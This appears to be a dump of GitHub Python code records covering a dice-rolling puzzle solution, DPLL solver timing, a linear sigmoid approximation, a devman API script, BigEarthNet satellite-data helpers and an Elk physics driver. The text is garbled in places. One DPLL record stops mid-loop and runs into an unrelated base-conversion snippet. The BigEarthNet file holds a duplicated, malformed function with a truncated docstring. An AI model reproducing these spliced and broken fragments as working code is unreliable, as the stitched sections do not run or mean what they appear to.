+{"seq_id":"424290225","text":"# Baekjoon 14499: Dice Roll (주사위 굴리기)\n\nN, M, x, y, K = map(int, input().split())\n\ngrid = []\nfor _ in range(N):\n grid.append(list(map(int, input().split())))\n\ncmd = list(map(int, input().split()))\ndxy = [(1, 0), (0, 1), (0, -1), (-1, 0)] # south(4) east(1) west(2) north(3)\n\ndice = [0 for _ in range(6)] # face values; index 5 is the bottom face\n\nfor c in cmd:\n # move the dice on the map\n dx, dy = dxy[c%4]\n nx, ny = x+dx, y+dy\n if 0 <= nx < N and 0 <= ny < M:\n x, y = nx, ny\n else:\n continue\n\n # roll the dice: update the face values\n if c == 1: # east\n dice[0], dice[5], dice[3], dice[2] = dice[3], dice[2], dice[5], dice[0]\n elif c == 2: # west\n dice[0], dice[5], dice[3], dice[2] = dice[2], dice[3], dice[0], dice[5]\n elif c == 3: # north\n dice[1], dice[0], dice[4], dice[5] = dice[0], dice[4], dice[5], dice[1]\n elif c == 4: # south\n dice[1], dice[0], dice[4], dice[5] = dice[5], dice[1], dice[0], dice[4]\n\n if grid[x][y]:\n dice[5] = grid[x][y]\n grid[x][y] = 0\n else:\n grid[x][y] = dice[5]\n\n print(dice[0])","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"031주차/주사위 굴리기/hyunseo.py","file_name":"hyunseo.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"648036264","text":"from random import *\nfrom dpll import dpll\nfrom dpll_ena_cista_pojavitev import *\nfrom dpll_brez import dpll_osnoven\nfrom sudoku import *\nfrom time import clock\n\n\nprint(\"Comparison of DPLL algorithms with, without, and with only a single initial pure-literal check. \\n\")\n
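# each \"y\" answer below enables one timed run; D and D1 work on copies of the CNF, DB consumes it directly\n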
D = input(\"Compare DPLL with pure-literal elimination? (y/n) \")\nD1 = input(\"Compare DPLL with only one pure-literal pass (right at the start)? (y/n) \")\nDB = input(\"Compare the basic DPLL, with no pure-literal elimination? (y/n) \")\nL = 0\nif not (D==\"n\" and D1==\"n\" and DB==\"n\"):\n\tL = int(input(\"How many random board fillings (sudokus) should be generated? Enter a natural number.\"))\n\nif not (D==\"n\" and D1==\"n\" and DB==\"n\"):\n\tprint(\"\\n Empty sudoku:\")\n\tprint(\"=\"*25)\n\tCNF = sudoku([]).cnf()\n\nif D==\"y\":\n\tkopija = Cnf([Stavek([i for i in s.literali]) for s in CNF.stavki])\n\tbefore1 = clock()\n\trez1 = dpll(kopija)\n\tafter1 = clock()\n\tprint(\"DPLL with repeated pure-literal elimination takes {0} sec.\".format(after1-before1))\n\nif D1==\"y\":\n\tkopija = Cnf([Stavek([i for i in s.literali]) for s in CNF.stavki])\n\tbefore2 = clock()\n\trez2 = dpll_brez_ciste(kopija)\n\tafter2 = clock()\n\tprint(\"DPLL with a single pure-literal pass takes {0} sec.\".format(after2-before2))\n\nif DB==\"y\":\n\tbefore3 = clock()\n\trez3 = dpll_osnoven(CNF)\n\tafter3 = clock()\n\tprint(\"DPLL without any pure-literal elimination takes {0} sec.\".format(after3-before3))\n\n\n\nfor i in range(L): #how many test cases to run\n\tP = randint(1, 30) #how many cells will be pre-filled\n\tpolja = []\n\tp = 0\n\twhile p < P:\n# def convert_to_base(num: int, base: int) -> int:\n# \"\"\"Convert a decimal number to any base system\"\"\"\n# return 0 if num == 0 else convert_to_base(num // base, base) * DEC + num % base\n#\n#\n# print(f'convert num: {convert_to_base(20, 2)}, right res: {bin(11)}')\n# print(f'convert num: {convert_to_base(20, 8)}, right res: {oct(111)}')\n\nnum = 333333 # the number to convert\nbase = 8 # the target numeral system\ntemp = ''\nres = ''\nwhile (num > 0):\n temp += str(num % base)\n num //= base\nres = temp[::-1]\nprint(res)\nprint(oct(333333))\n","repo_name":"IgorPont/Python_immersion","sub_path":"Seminar2/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70127205033","text":"import logging\nfrom sympy import interpolating_spline, symbols, exp\nimport torch\nfrom torch import nn\n\ndef sigmoid(x):\n x = 1 + exp(-x)\n return 1/x\n\ndef get_nodes(indexes=[-6, -5, -3, -2, -1, 0, 1, 2, 3, 5, 6],\n func=sigmoid):\n \"\"\"boundary ensures the function attains its boundary values\"\"\"\n x = symbols(\"x\")\n if 0.0 not in indexes:\n indexes.append(0.0)\n indexes.sort() # sort ascending\n boundary = max(abs(indexes[-1]), abs(indexes[0]))\n indexes[-1] = boundary\n indexes[0] = - boundary\n # simplify(sigmoid(1) + sigmoid(-1))\n logging.debug(f\"Value range:\\n {indexes}\")\n sigmoid_sym = interpolating_spline(1,\n x,\n indexes,\n [float(func(n)) for n in indexes])\n nodes = {}\n for expr, set_pair in sigmoid_sym.as_expr_set_pairs():\n nodes[set_pair] = float(expr.diff()), float(expr.taylor_term(0, x))\n return nodes\n\ndef linear_sigmoid(x, nodes):\n y = torch.zeros_like(x)\n for set_pair, (scale, zero_point) in nodes.items():\n start, end = [torch.tensor(k, dtype=torch.float32) \n for k in set_pair.args[:2]]\n scale, zero_point = [torch.tensor(k, dtype=torch.float32) \n for k in [scale, zero_point]]\n cond = (x >= start) * (x < end)\n f = x * scale + zero_point\n y += f * cond\n y += torch.ones_like(x) * (x >= end)\n return y #* (y <=1) * (y >= 0)\n
","repo_name":"xinetzone/torch-book","sub_path":"tests/quant/sigmoid-fx/fixed_sigmoid.py","file_name":"fixed_sigmoid.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"18569693298","text":"import requests\nimport datetime\nimport pytz\n\n\ndef load_attempts():\n page = 1\n while True:\n api_response = requests.get(\n 'https://devman.org/api/challenges/solution_attempts',\n params={'page': page}\n ).json()\n page += 1\n if page > api_response['number_of_pages']:\n break\n for record in api_response['records']:\n yield {\n 'username': record['username'],\n 'timestamp': record['timestamp'],\n 'timezone': record['timezone'],\n }\n\n\ndef get_midnighters(attempts):\n midnight = 0\n morning = 5\n midnighters = set()\n for attempt in attempts:\n hour_of_attempt = timestamp_to_hours(attempt['timestamp'], attempt['timezone'])\n if midnight <= hour_of_attempt <= morning:\n midnighters.add(attempt['username'])\n return midnighters\n\n\ndef timestamp_to_hours(timestamp, user_timezone):\n return datetime.datetime.fromtimestamp(\n timestamp,\n tz=pytz.timezone(user_timezone)\n ).hour\n\n\nif __name__ == '__main__':\n print('Midnighters:')\n for midnighter in get_midnighters(load_attempts()):\n print(midnighter)\n","repo_name":"Serg4356/15_midnighters","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"}
+{"seq_id":"73904725033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 12 12:12:19 2020\n\n@author: Eoin.Walsh\n\"\"\"\n\nimport os \nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport utm\nimport csv\n\n\"\"\"Script for dealing with the data provided by Big Earth Net\n\n Functions: \n \n 1. rgb_img() ---gathers the 3 colour bands for the \n sentinel-2 data and creates a 3 channel array \n (rgb image when plotted)\n \n 2. near_infrared() ---gathers the near infrared band \n for the sentinel-2 data and creates\n a 1 channel array (grayscale image when plotted)\n \n 3. utm_to_latlon_upper() ---gathers the utm coordinate of \n the top left corner of a sentinel-2 segment\n from the metadata file and converts it to (lat,lon)\n \n 4. utm_to_latlon_lower() ---gathers the utm coordinate of \n the bottom right corner of a sentinel-2 segment\n from the metadata file and converts it to (lat,lon)\n \n 5. utm_coords() ---gathers the utm coordinates for the bottom right and top left\n corners of the corresponding segments.\n \n 6. remove_noisy_images() ---removes the noisy images (images that contain cloud etc) \n from the bigearthnet sentinel-2 dataset\n \n 7. primary_cover_classes() ---primary land cover classes as defined by the \n corine dataset for european landcover types\n \n 8. label_primary() ---labels the bigearthnet data in terms of corine primary\n labels rather than the tertiary labels provided in the dataset\n \n 9. secondary_cover_classes() ---secondary land cover classes as defined by the \n corine dataset for european landcover types\n \n 10. label_secondary() ---labels the bigearthnet data in terms of corine secondary\n labels rather than the tertiary labels provided in the dataset\n \n\n\"\"\"\n
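# Hypothetical usage sketch (the segment path below is an assumption, not part of this script):\n# seg = 'BigEarthNet-v1.0/S2B_MSIL2A_20170924_example_patch'\n# image, labels = rgb_img(seg, plot=False, labels=False)\n# lat, lon = utm_to_latlon_upper(seg, prints=False)\n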
def rgb_img(path,plot=True,labels=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n plot = True - plots the rgb image for the segment\n plot = False - no plot, just returns the corresponding array\n \n labels = True - Print corine labels for the segment \n labels = False - No print, just returns the labels as a list\n \n Returns: 3 channel numpy array for rgb image + corresponding corine labels\n \n \"\"\"\n \n images = sorted(os.listdir(path)) #list the data in the directory\n \n \n blue = os.path.join(path,images[1]) #blue sentinel-2 band path\n blue = np.array(cv2.imread(blue,cv2.IMREAD_GRAYSCALE)) #create blue band array\n \n green = os.path.join(path,images[2]) #green sentinel-2 band path\n green = np.array(cv2.imread(green,cv2.IMREAD_GRAYSCALE)) #create green band array\n \n red = os.path.join(path,images[3]) #red sentinel-2 band path \n red = np.array(cv2.imread(red,cv2.IMREAD_GRAYSCALE)) #create red band array\n \n image = np.dstack((red,green,blue)) # stack the 3 bands to create rgb array\n \n #plot the rgb image\n if plot==True:\n \n image = (image/np.max(image)).astype('float32')\n \n fig, axes = plt.subplots()\n fig.set_size_inches(5, 5, forward=True)\n fig.set_dpi(500)\n plt.imshow(image)\n plt.axis('off')\n plt.show()\n \n metadata = os.path.join(path,images[12]) #metadata for the segment path\n file = open(metadata) #open the metadata file\n data = json.load(file) #load the json metadata file\n label = data['labels'] #parse labels data from metadata json file\n \n #print the labels\n if labels==True:\n \n print(\"\\nLabels: \",data['labels'])\n \n return image,label #return 3 channel image array and corresponding corine labels\n\ndef near_infrared(path,plot=True,labels=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n plot = True - plots the rgb image for the segment\n plot = False - no plot, just returns the corresponding array\n \n labels = True - Print corine labels for the segment \n labels = False - No print, just returns the labels as a list\n \n Returns: 1 channel numpy array + corresponding corine labels\n \n \"\"\"\n \n images = sorted(os.listdir(path)) #list the data in the directory\n \n near_infrared = os.path.join(path,images[7]) #near infrared band path\n near_infrared = np.array(cv2.imread(near_infrared,cv2.IMREAD_GRAYSCALE)) #near infrared band as array\n \n #plot the near-infrared image\n if plot==True:\n \n fig, axes = plt.subplots()\n fig.set_size_inches(5, 5, forward=True)\n fig.set_dpi(500)\n plt.imshow(np.squeeze(near_infrared),cmap = 'Greys_r', vmax = np.max(near_infrared), vmin = np.min(near_infrared))\n plt.axis('off')\n plt.show()\n \n metadata = os.path.join(path,images[12]) #metadata path\n file = open(metadata) #open metadata file\n data = json.load(file) #load metadata json file\n label = data['labels'] #parse labels data from the json file (renamed so the boolean flag isn't overwritten)\n \n #print the labels\n if labels==True:\n \n print(\"Labels: \",data['labels'])\n \n return near_infrared,label #return 1 channel grayscale image array and corresponding corine labels\n\ndef utm_to_latlon_upper(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print (lat,lon) coordinates\n prints = False - don't print, just return the values\n \n Returns: upper left corner (lat,lon) coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = sorted(os.listdir(path)) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata file\n \n metadata = json.load(json_file) #load the metadata json file\n \n utm_x = metadata['coordinates']['ulx'] #parse metadata to obtain upper left corner x-coordinate of segment\n \n utm_y = metadata['coordinates']['uly'] #parse metadata to obtain upper left corner y-coordinate of segment\n \n tile_letter = metadata['tile_source'][41:42] #parse utm tile letter from metadata\n \n tile_number = int(metadata['tile_source'][39:41]) #parse utm tile number from metadata\n \n latitude, longitude = utm.to_latlon(utm_x, utm_y, tile_number, tile_letter) #convert the coordinate to (lat,lon)\n \n latitude,longitude = np.round(latitude,6).astype('float32'),np.round(longitude,6).astype('float32') #round the data to 6 decimals\n
left corner (lat,lon) coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = os.listdir(path) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata file\n \n metadata = json.load(json_file) #load the metadaat json file\n \n utm_x = metadata['coordinates']['ulx'] #parse metadata to obtain upper left corner x-coordinate of segment\n \n utm_y = metadata['coordinates']['uly'] #parse metadata to obtain upper left corner y-coordinate of segment\n \n tile_letter = metadata['tile_source'][41:42] #parse utm tile letter from metadata\n \n tile_number = int(metadata['tile_source'][39:41]) #parse utm tile number from metadata\n \n latitude, longitude = utm.to_latlon(utm_x, utm_y, tile_number, tile_letter) #convert the coordinate to (lat,lon)\n \n latitude,longitude = np.round(latitude,6).astype('float32'),np.round(longitude,6).astype('float32') #round the data to 6 decimals\n \n #print the (lat,lon) coordinates\n if prints==True:\n \n print('coordinates:',latitude,',',longitude)\n \n return latitude,longitude\n\ndef utm_to_latlon_lower(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print (lat,lon) coordinates\n prints = False - dont print, just return the values\n \n Returns: lower right corner (lat,lon) coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = sorted(os.listdir(path)) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata \n \n metadata = json.load(json_file) #load the metadata json file\n \n utm_x = metadata['coordinates']['lrx'] #parse metadata to obtain lower right corner x-coordinate of segment\n \n utm_y = metadata['coordinates']['lry'] #parse metadata to obtain lower right corner y-coordinate of segment\n \n tile_letter = metadata['tile_source'][41:42] #parse utm tile letter from metadata\n \n tile_number = int(metadata['tile_source'][39:41]) #parse utm tile number from metadata\n \n latitude, longitude = utm.to_latlon(utm_x, utm_y, tile_number, tile_letter) #convert the coordinate to (lat,lon)\n \n latitude,longitude = np.round(latitude,6).astype('float32'),np.round(longitude,6).astype('float32') #round the data to 6 decimals\n \n #print the (lat,lon) coordinates\n if prints==True:\n \n print('coordinates:',latitude,',',longitude)\n \n return latitude,longitude\n\ndef utm_coords(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print utm coordinates\n prints = False - dont print, just return the values\n \n Returns: lower right corner utm coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = sorted(os.listdir(path)) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata file\n \n metadata = json.load(json_file) #load the json file\n \n utm_x_upper = metadata['coordinates']['ulx'] #parse the upper left x-coordinate\n \n utm_y_upper = metadata['coordinates']['uly'] #parse the upper left y-coordinate\n \n utm_x_lower = metadata['coordinates']['lrx'] #parse the lower right x-coordinate\n \n utm_y_lower = metadata['coordinates']['lry'] #parse the lower right y-coordinate\n \n utm_upper = utm_x_upper,utm_y_upper #define the upper coordinate\n \n utm_lower = utm_x_lower,utm_y_lower #define the lower coordinate\n \n #print the 
 if prints==True:\n \n print('Upper Coordinates:',utm_upper)\n \n print('\\n\\nLower Coordinates:',utm_lower)\n \n \n return utm_upper,utm_lower\n\ndef remove_noisy_images(images):\n \n \"\"\"images = list of the directories containing sentinel-2 band data\n \n Returns: Sentinel-2 data with snow and cloud cover removed\n \n \"\"\"\n \n snow_data = [] #initiate list\n \n cloud_data = [] #initiate list\n \n #directory containing csv files with names of segment files that have cloud and snow present\n current_path = os.getcwd()\n noisy_data_dir = current_path+'/Big_Earth_Net_noisy_data'\n \n files = sorted(os.listdir(noisy_data_dir)) #list the csv files\n \n snow_dir = os.path.join(noisy_data_dir,files[1]) #csv file containing info on snow covered segments path\n\n #read the snow csv file and append rows to the initiated list\n with open(snow_dir) as csvfile:\n \n readCSV = csv.reader(csvfile, delimiter=',')\n \n for row in readCSV:\n \n snow_data.append(row)\n \n snow_data = np.hstack(snow_data) #convert list to numpy array\n \n cloud_dir = os.path.join(noisy_data_dir,files[0]) #csv file containing info on cloud covered segments path\n \n #read the cloud csv file and append rows to the initiated list\n with open(cloud_dir) as csvfile:\n \n readCSV = csv.reader(csvfile, delimiter=',')\n \n for row in readCSV:\n \n cloud_data.append(row)\n \n cloud_data = np.hstack(cloud_data) #convert list to numpy array\n \n #compare the overall list with the snow list and create a list with the common strings removed\n cleaned_data = np.setdiff1d(images,snow_data) \n \n #compare the new overall list with the cloud list and create a list with the common strings removed\n cleaned_data1 = np.setdiff1d(cleaned_data,cloud_data) \n \n return cleaned_data1\n \ndef primary_cover_classes(path):\n \n \"\"\"path = directory containing the text files which contain info on which\n tertiary corine labels belong to which primary classes\n \n Returns: dictionary with 6 lists defining which tertiary corine labels belong \n to which primary classes\n \n \"\"\"\n \n txt_files = sorted(os.listdir(path)) #list the primary class info .txt files\n \n urban_path = os.path.join(path,txt_files[3]) #urban class text file\n \n agri_path = os.path.join(path,txt_files[0]) #agri-rural class text file\n \n non_agri_path = os.path.join(path,txt_files[2]) #non-agri rural text file\n \n nodata_path = os.path.join(path,txt_files[1]) #no data text file\n \n water_path = os.path.join(path,txt_files[4]) #water text file\n \n wetlands_path = os.path.join(path,txt_files[5]) #wetlands text file\n \n #read the text file for urban and create a list from the lines\n with open(urban_path,'r') as txtfile:\n \n urban = txtfile.readlines()\n \n for i in range(len(urban)):\n \n urban[i] = urban[i].replace('\\n','')\n \n #read the text file for agri rural and create a list from the lines\n with open(agri_path,'r') as txtfile:\n \n agri = txtfile.readlines()\n \n for i in range(len(agri)):\n \n agri[i] = agri[i].replace('\\n','')\n \n #read the text file for non-agri rural and create a list from the lines\n with open(non_agri_path,'r') as txtfile:\n \n non_agri = txtfile.readlines()\n \n for i in range(len(non_agri)):\n \n non_agri[i] = non_agri[i].replace('\\n','') \n \n #read the text file for no data and create a list from the lines\n with open(nodata_path,'r') as txtfile:\n \n nodata = txtfile.readlines()\n \n for i in range(len(nodata)):\n \n nodata[i] = nodata[i].replace('\\n','')\n \n #read the text file for water and create a list from the lines\n
 with open(water_path,'r') as txtfile:\n \n water = txtfile.readlines()\n \n for i in range(len(water)):\n \n water[i] = water[i].replace('\\n','')\n \n #read the text file for wetlands and create a list from the lines\n with open(wetlands_path,'r') as txtfile:\n \n wetlands = txtfile.readlines()\n \n for i in range(len(wetlands)):\n \n wetlands[i] = wetlands[i].replace('\\n','')\n \n #create a dictionary containing the lists\n primary_covers_dict = { \"urban\" : urban,\n \"agri-rural\" : agri,\n \"non-agri-rural\" : non_agri,\n \"wetlands\" : wetlands,\n \"water\" : water,\n \"No Data\" : nodata\n }\n\n return primary_covers_dict\n \ndef label_primary(labelss,dictionary):\n \n \"\"\"labelss = tertiary labels for a particular sentinel-2 segment from bigearthnet \n \n dictionary = dictionary containing info about which tertiary labels belong to which \n primary class, obtained using primary_cover_classes() function above\n \n Returns: the list of labels with each tertiary corine label replaced by its \n primary class\n \n \"\"\"\n \n urban = dictionary['urban'] #urban labels list\n\n agri_rural = dictionary['agri-rural'] #agri-rural labels list\n \n nonagri_rural = dictionary['non-agri-rural'] #non-agri rural labels list\n \n wetlands = dictionary['wetlands'] #wetlands labels list\n \n water = dictionary['water'] #water labels list\n \n nodata = dictionary['No Data'] #nodata labels list\n \n #check which class each tertiary label for the segment belongs to and then \n #change the label name to that class\n for i in range(len(labelss)):\n \n if labelss[i] in urban:\n \n labelss[i] = 'urban'\n \n if labelss[i] in agri_rural:\n \n labelss[i] = 'agri-rural'\n \n if labelss[i] in nonagri_rural:\n \n labelss[i] = 'non-agri-rural'\n \n if labelss[i] in wetlands:\n \n labelss[i] = 'wetlands'\n \n if labelss[i] in water:\n \n labelss[i] = 'water'\n \n if labelss[i] in nodata:\n \n labelss[i] = 'no data'\n \n return labelss\n \ndef secondary_cover_classes(path):\n \n \n \"\"\"path = directory containing the text files which contain info on which\n tertiary corine labels belong to which secondary classes\n \n Returns: dictionary with 16 lists defining which tertiary corine labels belong \n to which secondary classes\n \n \"\"\"\n \n txt_files = sorted(os.listdir(path)) #list of text files\n \n #paths to all of the text files for each landcover type\n arable_land_path = os.path.join(path,txt_files[0])\n \n coastal_water_path = os.path.join(path,txt_files[1])\n \n coastal_wetlands_path = os.path.join(path,txt_files[2])\n \n construction_sites_path = os.path.join(path,txt_files[3])\n \n forests_path = os.path.join(path,txt_files[4])\n \n fruit_plantations_path = os.path.join(path,txt_files[5])\n \n industry_path = os.path.join(path,txt_files[6])\n \n inland_water_path = os.path.join(path,txt_files[7])\n \n nodata_path = os.path.join(path,txt_files[8])\n \n pastures_path = os.path.join(path,txt_files[9])\n \n peatlands_path = os.path.join(path,txt_files[10])\n \n sparse_areas_path = os.path.join(path,txt_files[11])\n \n urban_green_path = os.path.join(path,txt_files[12])\n \n urban_fabric_path = os.path.join(path,txt_files[13])\n \n vegetation_path = os.path.join(path,txt_files[14])\n \n wild_grassland_path = os.path.join(path,txt_files[15])\n \n #creating lists from text files\n with open(arable_land_path,'r') as txtfile:\n \n arable_land = txtfile.readlines()\n \n for i in range(len(arable_land)):\n \n arable_land[i] = arable_land[i].replace('\\n','')\n \n with 
open(coastal_water_path,'r') as txtfile:\n \n coastal_water = txtfile.readlines()\n \n for i in range(len(coastal_water)):\n \n coastal_water[i] = coastal_water[i].replace('\\n','')\n \n with open(coastal_wetlands_path,'r') as txtfile:\n \n coastal_wetlands = txtfile.readlines()\n \n for i in range(len(coastal_wetlands)):\n \n coastal_wetlands[i] = coastal_wetlands[i].replace('\\n','') \n \n with open(construction_sites_path,'r') as txtfile:\n \n construction_sites = txtfile.readlines()\n \n for i in range(len(construction_sites)):\n \n construction_sites[i] = construction_sites[i].replace('\\n','')\n \n with open(forests_path,'r') as txtfile:\n \n forests = txtfile.readlines()\n \n for i in range(len(forests)):\n \n forests[i] = forests[i].replace('\\n','')\n \n with open(fruit_plantations_path,'r') as txtfile:\n \n fruit_plantations = txtfile.readlines()\n \n for i in range(len(fruit_plantations)):\n \n fruit_plantations[i] = fruit_plantations[i].replace('\\n','')\n \n with open(industry_path,'r') as txtfile:\n \n industry = txtfile.readlines()\n \n for i in range(len(industry)):\n \n industry[i] = industry[i].replace('\\n','')\n\n with open(inland_water_path,'r') as txtfile:\n \n inland_water = txtfile.readlines()\n \n for i in range(len(inland_water)):\n \n inland_water[i] = inland_water[i].replace('\\n','')\n \n with open(nodata_path,'r') as txtfile:\n \n nodata = txtfile.readlines()\n \n for i in range(len(nodata)):\n \n nodata[i] = nodata[i].replace('\\n','')\n \n with open(pastures_path,'r') as txtfile:\n \n pastures = txtfile.readlines()\n \n for i in range(len(pastures)):\n \n pastures[i] = pastures[i].replace('\\n','')\n \n with open(peatlands_path,'r') as txtfile:\n \n peatlands = txtfile.readlines()\n \n for i in range(len(peatlands)):\n \n peatlands[i] = peatlands[i].replace('\\n','')\n \n with open(sparse_areas_path,'r') as txtfile:\n \n sparse_areas = txtfile.readlines()\n \n for i in range(len(sparse_areas)):\n \n sparse_areas[i] = sparse_areas[i].replace('\\n','')\n \n with open(urban_green_path,'r') as txtfile:\n \n urban_green = txtfile.readlines()\n \n for i in range(len(urban_green)):\n \n urban_green[i] = urban_green[i].replace('\\n','')\n \n with open(urban_fabric_path,'r') as txtfile:\n \n urban_fabric = txtfile.readlines()\n \n for i in range(len(urban_fabric)):\n \n urban_fabric[i] = urban_fabric[i].replace('\\n','')\n \n with open(vegetation_path,'r') as txtfile:\n \n vegetation = txtfile.readlines()\n \n for i in range(len(vegetation)):\n \n vegetation[i] = vegetation[i].replace('\\n','')\n \n with open(wild_grassland_path,'r') as txtfile:\n \n wild_grassland = txtfile.readlines()\n \n for i in range(len(wild_grassland)):\n \n wild_grassland[i] = wild_grassland[i].replace('\\n','')\n \n #dictionary with lists assigning tertiary labels to secondary classes\n secondary_covers_dict = { \"urban fabric\" : urban_fabric,\n \"arable land\" : arable_land,\n \"coastal water\" : coastal_water,\n \"coastal wetlands\" : coastal_wetlands,\n \"construction sites\" : construction_sites,\n \"forests\" : forests,\n \"fruit plantations\" : fruit_plantations,\n \"industry\" : industry,\n \"inland water\" : inland_water,\n \"no data\" : nodata,\n \"pastures\" : pastures,\n \"peatlands\" : peatlands,\n \"sparse areas\" : sparse_areas,\n \"urban green\" : urban_green,\n \"vegetation\" : vegetation,\n \"wild grassland\" : wild_grassland\n }\n\n return secondary_covers_dict \n\ndef label_secondary(labelss,dictionary):\n \n \"\"\"labelss = tertiary labels for a particular sentinel-2 
segment from bigearthnet \n \n dictionary = dictionary containing info about which tertiary labels bleong to which \n secondary class, obtained using secondary_cover_classes() function above\n \n Returns: dictionary with 15 lists defining which tertiary corine labels belong \n to which secondary classes\n \n \"\"\"\n \n urban_fabric = dictionary['urban fabric']\n\n arable_land = dictionary['arable land']\n \n coastal_water = dictionary['coastal water']\n \n coastal_wetlands = dictionary['coastal wetlands']\n \n construction_sites = dictionary['construction sites']\n \n forests = dictionary['forests']\n \n fruit_plantations = dictionary['fruit plantations']\n \n industry = dictionary['industry']\n \n inland_water = dictionary['inland water']\n \n no_data = dictionary['no data']\n \n pastures = dictionary['pastures']\n \n peatlands = dictionary['peatlands']\n \n sparse_areas = dictionary['sparse areas']\n \n urban_green = dictionary['urban green']\n \n vegetation = dictionary['vegetation']\n \n wild_grassland = dictionary['wild grassland']\n \n #find out which secondary class the labels in question belong to and then rename\n #the label the class in question\n for i in range(len(labelss)):\n \n if labelss[i] in urban_fabric:\n \n labelss[i] = 'urban fabric'\n \n if labelss[i] in arable_land:\n \n labelss[i] = 'arable land'\n \n if labelss[i] in coastal_water:\n \n labelss[i] = 'coastal water'\n \n if labelss[i] in coastal_wetlands:\n \n labelss[i] = 'coastal wetlands'\n \n if labelss[i] in construction_sites:\n \n labelss[i] = 'construction sites'\n \n if labelss[i] in forests:\n \n labelss[i] = 'forests'\n\n if labelss[i] in fruit_plantations:\n \n labelss[i] = 'fruit plantations'\n\n if labelss[i] in industry:\n \n labelss[i] = 'industry'\n \n if labelss[i] in inland_water:\n \n labelss[i] = 'inland water'\n \n if labelss[i] in no_data:\n \n labelss[i] = 'no data'\n \n if labelss[i] in pastures:\n \n labelss[i] = 'pastures'\n \n if labelss[i] in peatlands:\n \n labelss[i] = 'peatlands'\n \n if labelss[i] in sparse_areas:\n \n labelss[i] = 'sparse areas'\n \n if labelss[i] in urban_green:\n \n labelss[i] = 'urban green'\n \n if labelss[i] in vegetation:\n \n labelss[i] = 'vegetation'\n \n if labelss[i] in wild_grassland:\n \n labelss[i] = 'wild grassland'\n \n return labelss\n\n\n\n \n \n","repo_name":"gbessardon/EoinWalshphysiographyAI","sub_path":"BigEarthnet_extraction/bigearthnet.py","file_name":"bigearthnet.py","file_ext":"py","file_size_in_byte":26682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10367915669","text":"#!/usr/bin/python\n# coding: UTF-8\n# This is created 2022/01/05 by Y. 
Shinohara\nimport sys\nfrom modules.constants import *\nfrom modules.parameters import ElkFiles, ElkData\n\nED = ElkData()\nEFs = ElkFiles()\n#\nargv = sys.argv\nargc = len(argv)\n# First standard input is the directory path we want\nif (argc != 4):\n    print('# Error: three arguments are required: directory path, Elk version and Fortlib_option.')\n    sys.exit()\nelse:\n    dir_path = argv[1]\n    print('# The directory path is \"'+dir_path+'\".')\n    elk_ver = int(argv[2])\n    print('# Elk version is \"'+str(elk_ver)+'\".')\n    Fortlib_option = argv[3]\n    print('# Fortlib_option is \"'+str(Fortlib_option)+'\".')\n\nED.get_eigval_pmat(EFs, dir_path, elk_ver)\n\nfrom modules.generate_sigma_epsilon import GenerateSigmaEpsilon\nomega, sigma, epsilon, epsilon_inv = GenerateSigmaEpsilon.generate(ED, Fortlib_option, ewidth = 0.002)\nsum_epsilon, sum_epsilon_inv, omega_plasma = GenerateSigmaEpsilon.check_sum(ED)\n\n","repo_name":"Yasushi-Shinohara/Scripts4Elk","sub_path":"src/Get_linear_response.py","file_name":"Get_linear_response.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31060450145","text":"from __future__ import print_function\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import *\nimport base64\n\nimport os.path\nimport config\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = ['https://www.googleapis.com/auth/calendar']\n\n# Convert time from 12 hrs to RFC3339 standard\ndef time_convert(t):\n    try:\n        t = datetime.strptime(t, '%I:%M%p')\n        return(t.time())\n    except ValueError:\n        # If only a single time is mentioned then default to 00:00:00 for the start time\n        print(\"start time missing\") \n        return(\"00:00:00\") \n\n# To insert the events to Calendar via API v3\ndef inserter(dict,creds):\n    try:\n        service = build('calendar', 'v3', credentials=creds)\n\n        # Template to Insert an event\n\n        # Added base32hexencode as id to avoid creating duplicate events. 
